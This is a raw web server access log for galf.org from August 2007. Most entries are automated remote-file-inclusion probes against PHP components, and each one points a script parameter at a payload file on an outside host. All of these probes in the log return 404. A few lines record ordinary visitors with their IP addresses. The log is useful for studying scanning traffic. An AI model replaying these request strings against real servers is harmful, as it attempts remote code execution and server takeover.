163.247.46.100 - - [05/Aug/2007:18:21:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?q=lesbianas&gbv=1&hl=es&ie=UTF-8&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.galf.org"
74.6.72.56 - - [05/Aug/2007:18:21:58 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
163.247.46.100 - - [05/Aug/2007:18:22:14 -0700] "GET /?S=A HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.galf.org"
163.247.46.100 - - [05/Aug/2007:18:22:17 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/?S=A" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.galf.org"
74.6.17.159 - - [05/Aug/2007:18:23:15 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.101.17.36 - - [05/Aug/2007:18:25:15 -0700] "GET /logs/access_070716.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://azahan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
208.101.17.36 - - [05/Aug/2007:18:25:15 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://azahan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
208.101.17.36 - - [05/Aug/2007:18:25:15 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://azahan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:18:25:18 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:18:25:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:18:25:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
4.79.181.236 - - [05/Aug/2007:18:25:26 -0700] "GET /logsmiddle.php?file=http://www.mueritz-safari.de//modules/photoshare/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:18:25:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:18:25:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:18:25:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
192.84.150.37 - - [05/Aug/2007:18:29:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
192.84.150.37 - - [05/Aug/2007:18:29:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.116.12.58 - - [05/Aug/2007:18:33:56 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.116.12.58 - - [05/Aug/2007:18:33:56 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.46 - - [05/Aug/2007:18:36:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/m3ks/bot/meks1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:19 -0700] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:28 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:36 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:38 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:44 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:39:48 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
72.232.198.2 - - [05/Aug/2007:18:39:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.198.2 - - [05/Aug/2007:18:39:48 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
201.240.22.243 - - [05/Aug/2007:18:39:53 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:40:02 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:40:04 -0700] "GET /logs/ HTTP/1.1" 200 4942 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:41:12 -0700] "GET /?N=D HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
201.240.22.243 - - [05/Aug/2007:18:41:15 -0700] "GET /?N=D HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; (R1 1.3))" "www.galf.org"
84.40.22.36 - - [05/Aug/2007:18:41:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://newoloblog.com/tool/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:18:43:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
24.79.204.232 - - [05/Aug/2007:18:43:43 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
24.79.204.232 - - [05/Aug/2007:18:43:43 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:18:43:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
213.22.71.168 - - [05/Aug/2007:18:46:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.22.71.168 - - [05/Aug/2007:18:46:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.131.249.131 - - [05/Aug/2007:18:47:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://newoloblog.com/tool/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.80.248.166 - - [05/Aug/2007:18:49:48 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.80.248.166 - - [05/Aug/2007:18:49:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.237.43 - - [05/Aug/2007:18:49:53 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [05/Aug/2007:18:49:54 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:18:52:49 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.183.154 - - [05/Aug/2007:18:52:49 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
200.161.128.11 - - [05/Aug/2007:18:53:57 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.161.128.11 - - [05/Aug/2007:18:53:58 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:18:55:46 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.183.154 - - [05/Aug/2007:18:55:46 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.106.155 - - [05/Aug/2007:18:56:10 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.106.155 - - [05/Aug/2007:18:56:10 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:19:00:05 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:19:00:05 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.89.227.61 - - [05/Aug/2007:19:00:10 -0700] "GET /logs/access_070804.log HTTP/1.0" 404 275 "-" "Wget/1.10.2" "galf.org"
216.120.237.36 - - [05/Aug/2007:19:00:20 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:00:20 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:00:42 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:00:42 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
61.220.103.250 - - [05/Aug/2007:19:00:46 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.220.103.250 - - [05/Aug/2007:19:00:47 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
65.199.17.178 - - [05/Aug/2007:19:02:13 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.199.17.178 - - [05/Aug/2007:19:02:13 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:04:19 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:04:19 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:04:26 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:04:26 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
200.212.235.131 - - [05/Aug/2007:19:06:47 -0700] "GET /logs/index.php?go=http://ratoscan.com/botcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.212.235.131 - - [05/Aug/2007:19:06:48 -0700] "GET /index.php?go=http://ratoscan.com/botcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.227.138.210 - - [05/Aug/2007:19:08:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.227.138.210 - - [05/Aug/2007:19:08:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:08:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:08:08 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
65.98.88.114 - - [05/Aug/2007:19:08:59 -0700] "GET /logs/http:/4ck.me.uk/safe.txt?=%22http://www.geocities.com/gue_plur/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.98.88.114 - - [05/Aug/2007:19:09:05 -0700] "GET /http:/4ck.me.uk/safe.txt?=%22http://www.geocities.com/gue_plur/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:11:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
89.36.21.170 - - [05/Aug/2007:19:11:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
89.36.21.170 - - [05/Aug/2007:19:12:07 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:12:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
88.191.39.142 - - [05/Aug/2007:19:12:55 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:19:12:55 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.180.173.59 - - [05/Aug/2007:19:18:51 -0700] "GET /template.php?pagina=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.180.173.59 - - [05/Aug/2007:19:18:52 -0700] "GET /template.php?pagina=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:19:20:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.155.176 - - [05/Aug/2007:19:20:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:21:38 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:21:38 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:19:21:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.61.30.133 - - [05/Aug/2007:19:21:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.60.115.20 - - [05/Aug/2007:19:21:59 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.115.20 - - [05/Aug/2007:19:21:59 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:22:05 -0700] "GET /logs/index.php?x=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
89.36.21.170 - - [05/Aug/2007:19:22:06 -0700] "GET /index.php?x=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:22:15 -0700] "GET /logs/index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.36 - - [05/Aug/2007:19:22:16 -0700] "GET /index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:22:28 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:22:28 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:24:54 -0700] "GET /logs/index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [05/Aug/2007:19:24:54 -0700] "GET /index.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.232.198.2 - - [05/Aug/2007:19:25:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.198.2 - - [05/Aug/2007:19:25:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
195.219.190.50 - - [05/Aug/2007:19:25:52 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://henca.prohosts.org/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.219.190.50 - - [05/Aug/2007:19:25:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://henca.prohosts.org/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.27.114.4 - - [05/Aug/2007:19:26:12 -0700] "GET /logs/news.php?cfg[path][includes]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.27.114.4 - - [05/Aug/2007:19:26:12 -0700] "GET /news.php?cfg[path][includes]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.237.43 - - [05/Aug/2007:19:27:54 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.43 - - [05/Aug/2007:19:27:54 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.88.114 - - [05/Aug/2007:19:30:09 -0700] "GET /logs/cnil.fr/index.php?id=%22http://www.geocities.com/gue_plur/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.98.88.114 - - [05/Aug/2007:19:30:11 -0700] "GET /cnil.fr/index.php?id=%22http://www.geocities.com/gue_plur/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:19:36:09 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.200.25 - - [05/Aug/2007:19:36:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.183.154 - - [05/Aug/2007:19:40:48 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:19:40:49 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
66.11.230.61 - - [05/Aug/2007:19:41:07 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.110.128.68 - - [05/Aug/2007:19:44:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.110.128.68 - - [05/Aug/2007:19:44:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.110.128.68 - - [05/Aug/2007:19:44:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.110.128.68 - - [05/Aug/2007:19:44:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.150.127.148 - - [05/Aug/2007:19:50:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
